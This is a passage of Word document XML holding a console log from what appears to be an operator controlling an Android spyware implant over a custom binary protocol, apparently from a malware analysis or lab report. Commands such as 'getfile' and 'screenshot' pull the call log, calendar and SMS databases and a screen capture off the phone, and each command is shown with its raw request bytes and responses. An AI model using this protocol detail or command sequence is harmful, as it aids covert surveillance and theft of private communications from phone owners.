        <w:t xml:space="preserve">00000010: 04 00 00 00 00 00 00 00 00 00 00 00              ............    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44722363" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>apt returned: 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C472B7" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>APT&gt;ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3071C9F2" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>sending: '\x08\x00\x00\x00\x18\x00\x00\x00' (8 bytes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="185D1F3C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000000: 08 00 00 00 18 00 00 00                          ........        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4783FDDD" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>received:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DAEE28D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>00000000: 46 00 00 00 19 00 00 00 00 00 00 00 2E 00 00 00  F...............</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2935F7D7" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>00000010: 2E 00 00 00 00 00 00 00 66 69 6C 65 73 0A 73 68  ........files.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1671CAED" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>00000020: 61 72 65 64 5F 70 72 65 66 73 0A 64 61 74 61 62  ared_prefs.datab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26829514" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>00000030: 61 73 65 73 0A 63 6F 64 65 5F 63 61 63 68 65 0A  ases.code_cache.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A9DF5D5" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000040: 63 61 63 68 65 0A                                cache.          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18ECD6DB" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>apt returned: files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50FB4761" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>shared_prefs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52EE3A71" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>databases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1844D19A" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>code_cache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2329BE8A" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>cache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137F7373" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B7CC8EA" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>APT&gt;cd databases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D346D16" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>sending: '"\x00\x00\x00\x12\x00\x00\x00\x00\x00\x00\x00\n\x00\x00\x00\n\x00\x00\x00\x00\x00\x00\x00databases\x00' (34 bytes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F49A1AE" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>00000000: 22 00 00 00 12 00 00 00 00 00 00 00 0A 00 00 00  "...............</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46CC955C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>00000010: 0A 00 00 00 00 00 00 00 64 61 74 61 62 61 73 65  ........database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="318ABBB8" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000020: 73 00                                            s.              </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32505EC2" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>received:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="504FF4F1" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>00000000: 1C 00 00 00 13 00 00 00 00 00 00 00 04 00 00 00  ................</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2674B1CC" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000010: 04 00 00 00 00 00 00 00 00 00 00 00              ............    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65D59654" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>apt returned: 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF50FB2" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>APT&gt;ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D68112E" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>sending: '\x08\x00\x00\x00\x18\x00\x00\x00' (8 bytes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C67F2AB" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000000: 08 00 00 00 18 00 00 00                          ........        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD5659C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>received:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A7E331" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>00000000: 61 00 00 00 19 00 00 00 00 00 00 00 49 00 00 00  a...........I...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC3C09E" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>00000010: 49 00 00 00 00 00 00 00 63 61 6C 6C 6C 6F 67 2E  I.......calllog.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C143DE" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>00000020: 64 62 2D 6A 6F 75 72 6E 61 6C 0A 63 61 6C 6C 6C  db-journal.calll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F5566A8" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>00000030: 6F 67 2E 64 62 0A 70 72 6F 66 69 6C 65 2E 64 62  og.db.profile.db</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A4FE7B0" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>00000040: 2D 6A 6F 75 72 6E 61 6C 0A 70 72 6F 66 69 6C 65  -journal.profile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46782EAB" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>00000050: 2E 64 62 0A 63 6F 6E 74 61 63 74 73 32 2E 64 62  .db.contacts2.db</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA326E6" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000060: 0A                                               .               </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D17F1B1" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>apt returned: calllog.db-journal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A9FC640" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>calllog.db</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E8572E0" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>profile.db-journal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3094A4E3" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>profile.db</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51866411" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>contacts2.db</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB9C495" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10B74AE5" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>16:09</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C0E099" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>APT&gt;getfile calllog.db calllog.db</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C752A45" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>sending: '#\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00calllog.db\x00' (35 bytes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E366FE" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>00000000: 23 00 00 00 04 00 00 00 00 00 00 00 0B 00 00 00  #...............</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF2F485" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>00000010: 0B 00 00 00 00 00 00 00 63 61 6C 6C 6C 6F 67 2E  ........calllog.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="769B4869" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000020: 64 62 00                                         db.             </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E35E9E4" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>received: '\x18\x80\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00SQLite format 3\x00\x10\x00\x01\x01\x00@  \x00\x00\x00\x03\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00.\x10\xfc\r\x0f\x9f\x00'...'\x00\x00\x00\x00' (32792 bytes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="355AB282" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MD5(calllog.db) = 6d9428f65d4b3be7357933f163e4a3a6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="737F0788" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B50D23B" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>APT&gt;getfile /data/data/com.android.providers.calendar/databases/calendar.db calendar.db</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="169E1BF2" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>sending: 'X\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x00/data/data/com.android.providers.calendar/databases/calendar.db\x00' (88 bytes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA2C5CA" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>00000000: 58 00 00 00 04 00 00 00 00 00 00 00 40 00 00 00  X...........@...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="618ABD08" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>00000010: 40 00 00 00 00 00 00 00 2F 64 61 74 61 2F 64 61  @......./data/da</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2282D644" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>00000020: 74 61 2F 63 6F 6D 2E 61 6E 64 72 6F 69 64 2E 70  ta/com.android.p</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1062B9EF" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>00000030: 72 6F 76 69 64 65 72 73 2E 63 61 6C 65 6E 64 61  roviders.calenda</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3683C763" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>00000040: 72 2F 64 61 74 61 62 61 73 65 73 2F 63 61 6C 65  r/databases/cale</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7884F854" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000050: 6E 64 61 72 2E 64 62 00                          ndar.db.        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2037A6C7" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>received: '\x18\xe0\x01\x00\x05\x00\x00\x00\x00\x00\x00\x00\x00\xe0\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00SQLite format 3\x00\x10\x00\x01\x01\x00@  \x00\x00\x00\x04\x00\x00\x00\x1e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1a\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x1b\x00\x00\x00\x01\x00\x00\x02X\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00.\x10\xfc\x05\x00\x00\x00'...';END' (122904 bytes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1205E84D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MD5(calendar.db) = bdad3b64bd9108576ce3ddab54f32309</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07AD9ACF" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A189998" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>16:11</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC91E02" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>APT&gt;getfile /data/data/com.android.providers.telephony/databases/mmssms.db mmssms.db</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A90F8A3" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>sending: 'W\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00?\x00\x00\x00?\x00\x00\x00\x00\x00\x00\x00/data/data/com.android.providers.telephony/databases/mmssms.db\x00' (87 bytes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="469F4AC0" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>00000000: 57 00 00 00 04 00 00 00 00 00 00 00 3F 00 00 00  W...........?...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="680370CE" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>00000010: 3F 00 00 00 00 00 00 00 2F 64 61 74 61 2F 64 61  ?......./data/da</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="670B6C7F" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>00000020: 74 61 2F 63 6F 6D 2E 61 6E 64 72 6F 69 64 2E 70  ta/com.android.p</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C4E1FED" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>00000030: 72 6F 76 69 64 65 72 73 2E 74 65 6C 65 70 68 6F  roviders.telepho</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C2B8E22" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>00000040: 6E 79 2F 64 61 74 61 62 61 73 65 73 2F 6D 6D 73  ny/databases/mms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF86952" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000050: 73 6D 73 2E 64 62 00                             sms.db.         </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DED46C1" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>received: '\x18\xb0\x01\x00\x05\x00\x00\x00\x00\x00\x00\x00\x00\xb0\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00SQLite format 3\x00\x10\x00\x01\x01\x00@  \x00\x00\x00\x03\x00\x00\x00\x1b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00/\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x16\x00\x00\x00\x01\x00\x00\x00B\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00.\x10\xfc\x05\x00\x00\x00'...' END' (110616 bytes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C03D65" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MD5(mmssms.db) = f86d0db1b2ed3bb82b1c8c6841c2721d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44001904" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52CC99AD" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>APT&gt;screenshot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E3058EB" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>sending: '\x08\x00\x00\x00"\x00\x00\x00' (8 bytes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FCFE564" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000000: 08 00 00 00 22 00 00 00                          ...."...        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A02C1C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>received: 'HX\x01\x00#\x00\x00\x00\x00\x00\x00\x000X\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR\x00\x00\x048\x00\x00\x07\x80\x08\x06\x00\x00\x00+a\xe7\n\x00\x00\x00\x01sRGB\x00\xae\xce\x1c\xe9\x00\x00\x00\x04sBIT\x08\x08\x08\x08|\x08d\x88\x00\x00 \x00IDATx\x9c\xec\xddy\x90\x1cgy?\xf0o\x1fs\xec\xee\xcc\xde\xf7\xa9\xbdt\xadd\xc9\x96\x90%!\xff\x1c| \xd9'...'\xaeB`\x82' (88136 bytes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC8EE89" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>wrote 88112 bytes to screenshot.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0373D8BD" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E4E6B68" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
